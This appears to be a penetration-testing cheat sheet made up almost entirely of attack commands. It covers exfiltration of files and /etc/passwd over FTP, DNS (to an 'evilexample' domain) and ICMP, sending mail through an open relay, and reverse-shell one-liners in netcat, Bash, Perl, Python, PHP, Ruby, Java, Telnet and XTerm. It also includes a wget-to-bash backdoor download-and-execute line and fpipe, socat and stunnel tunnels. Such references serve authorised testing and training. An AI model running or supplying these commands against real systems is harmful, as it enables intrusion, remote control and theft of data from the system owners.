Table Of Contents

• Tips and Tricks
  • FTP Through Non-Interactive Windows Shell
  • DNS Transfer on Linux
  • Exfil Command Output on a Linux Machine Over ICMP
  • Sending Email From Open Relay (Telnet)
• Reverse Shells
  • Netcat
  • Perl
  • Python
  • Bash
  • Java
  • PHP
  • Ruby
  • Telnet
  • XTerm
  • WGET Script Download & Execute
• Tunneling
  • FPipe Tunnel
  • Socat Tunnel
  • SSL Encapsulated Netcat TunneL (STunnel)

---

TIPS AND TRICKS

FTP THROUGH NON-INTERACTIVE WINDOWS SHELL

echo open <IP_ADDRESS> 21 > ftp.txt
echo <USERNAME> >> ftp.txt
echo <PASSWORD> >> ftp.txt
echo bin >> ftp.txt
echo GET <FILE_PATH> >> ftp.txt
echo bye >> ftp.txt
ftp –v -n -s:ftp.txt

DNS TRANSFER ON LINUX

# [On Victim] -- Hex encode the file to be transferred:
xxd -p secret > file.hex

# [On Victim] -- Read in each line and do a DNS lookup:
for b in `cat file.hex `; do dig $b.shell.evilexample.com; done

# [On attacker] -- Capture DNS exfil packets:
tcpdump -w /tmp/dns -s0 port 53 and host system.example.com

# [On attacker] -- Cut the exfilled hex from the DNS packet:
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt

# [On attacker] -- Reverse the hex encoding:
xxd -r -p < received.txt > keys.pgp

EXFIL COMMAND OUTPUT ON A LINUX MACHINE OVER ICMP

# [On victim]
stringZ=`cat /etc/passwd | od -tx1 | cut -c8- | tr -d " " | tr -d "\n"`; counter=0; while (($counter <= ${#stringZ}));do ping -s 16 -c 1 -p ${stringZ:$counter:16} 192.168.10.10 && counter=$((counter+16));done

# [On attacker] -- capture packets to data.dmp and parse
tcpdump -ntvvSxs 0 'icmp[0]=8' > data.dmp
grep 0x0020 data.dmp | cut -c21- | tr -d " " | tr -d "\n" | xxd -r -p

SENDING EMAIL FROM OPEN RELAY (TELNET)

telnet <IP_ADDRESS> 25
HELO
MAIL FROM:<EMAIL_ADDRESS>
RCPT TO: <EMAIL_ADDRESS>
DATA
Thank You.
.
quit

REVERSE SHELLS

• Note: Start listener on attack box to catch reverse shells
• More info at:
  • https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  • http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
  • http://bit.ly/nuc0N0

NETCAT

Linux reverse shell

nc <IP_ADDRESS> <PORT> -e /bin/sh

Windows reverse shell

nc <IP_ADDRESS> <PORT> -e cmd.exe

Netcat work-around when –e option not possible

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP_ADDRESS> <PORT> >/tmp/f

PERL

Perl

perl -e ‘use Socket; $i="<IP_ADDRESS>"; $p=<PORT>; socket(S,PF_INET, SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S");open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};’

Perl without /bin/sh

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP_ADDRESS>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Perl for Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"<IP_ADDRESS>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PYTHON

python -c ‘import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<IP_ADDRESS>",<PORT>)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);’

BASH

bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1

JAVA

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP_ADDRESS>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP

php -r '$sock=fsockopen("<IP_ADDRESS>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

RUBY

Ruby

ruby -rsocket -e'f=TCPSocket.open("<IP_ADDRESS>",<PORT>).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Ruby without /bin/sh

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<IP_ADDRESS>","<PORT>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Ruby for Windows

ruby -rsocket -e 'c=TCPSocket.new("<IP_ADDRESS>","<PORT>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TELNET

telnet <IP_ADDRESS> <PORT> | /bin/bash | telnet <IP_ADDRESS> <PORT+1>

XTERM

# Start Listener (Listens on port 6001)
xnest :1

# Add permission to connect
xhost +<IP_ADDRESS>

# Telnet
xterm -display <IP_ADDRESS>

WGET SCRIPT DOWNLOAD & EXECUTE

wget -O- http://<IP_ADDRESS>:<PORT>/backdoor.sh | bash

TUNNELING

• More info at: https://edzeame.wordpress.com/2014/06/23/setting-up-stunnel-configurations/

FPIPE TUNNEL

Listen on port 1234 and forward to 2.2.2.2 on port 80

fpipe.exe -l 1234 -r 80 2.2.2.2

SOCAT TUNNEL

Listen on port 1234 and forward to 2.2.2.2 on port 80

socat TCP-LISTEN:1234,fork TCP:2.2.2.2:80

SSL ENCAPSULATED NETCAT TUNNEL (STUNNEL)

# (Listening Server) -- Generate SSL certificate
openssl req -new -x509 -days 365 -nodes -out stunnel.pem -keyout stunnel.pem

# (Listening Server) -- Modify stunnel configuration
# Modify /stunnel.conf
client = no
[netcat server]
accept = 4444
connect = 7777
cert = /etc/stunnel/stunnel.pem

# (Listening Server) -- Run stunnel
sudo stunnel ./stunnel.conf

# (Attacker) -- Modify stunnel configuration
# Modify /stunnel.conf
client = yes
[netcat client]
accept = 5555
connect = <LISTENING_IP>:4444

# (Attacker) -- Run stunnel
sudo stunnel ./stunnel.conf

# (Listening Server) -- Listen for netcat connection
nc -vlp 7777

# (Attacker) -- Connect into victim computer via netcat
nc -nv 127.0.0.1 5555